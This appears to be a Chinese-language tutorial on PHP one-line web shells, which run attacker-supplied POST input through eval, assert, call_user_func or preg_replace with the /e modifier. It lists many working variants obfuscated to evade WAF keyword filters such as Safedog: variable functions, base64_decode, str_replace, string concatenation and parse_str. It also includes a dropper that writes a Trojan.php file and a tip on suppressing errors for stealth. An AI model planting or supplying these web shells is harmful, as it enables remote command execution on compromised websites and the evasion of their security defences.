php一句话木马

一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。

为了绕过waf的检测，一句话木马出现了无数中变形，但本质是不变的：木马的函数执行了发送的命令。

通过GET 、POST 、COOKIE这三种方式向一个网站提交数据

一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收传递的数据，并把接收的数据传递给一句话木马中执行命令的函数，进而执行命令

一句话木马大多都是只有两个部分，一个是可以执行代码的函数部分，一个是接收数据的部分

如：

<?php eval(@$_POST['a']); ?>

<?php assert(@$_POST['a']); ?>

<?php
@call_user_func(assert,$_POST['a']);
?>

注：

　　call_user_func这个函数可以调用其它函数

<?php
@preg_replace("/abcde/e", $_POST['a'], "abcdefg");
?>

注：

　　在表达式的末尾加上“e”，那么这个函数的第二个参数就会被当作代码执行

<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

waf是网站的防火墙，例如安全狗就是waf的一种。

waf通常以关键字判断是否为一句话木马，但是一句话木马的变形有很多种，waf根本不可能全部拦截。

想要绕过waf，需要掌握各种PHP小技巧，掌握的技巧多了，把技巧结合起来，设计出属于自己的一句话木马。

想要绕过waf，PHP小技巧

变量

<?php
$a = "eval";
$a(@$_POST['a']);
?>

可变变量

<?php
$bb="eval";
$a="bb";
$$aa($_POST['a']);
?>

str_replace

<?php
$a=str_replace("Waldo", "", "eWaldoval");
$a(@$_POST['a']);
?>

base64_decode

<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>

字符串连接

<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>

parse_str

<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>

这些技巧每一种单独使用都不能绕过waf，但是与 第三大点提到的函数混合起来使用，就可以顺利的欺骗waf。
tips：使用一句话木马的时候可以在函数前加”@”符，这个符号让php语句不显示错误信息，增加隐蔽性。

<?php
function fun()
{return $_POST['a'];}
@preg_replace("/test/e",fun(),"test test test");
?>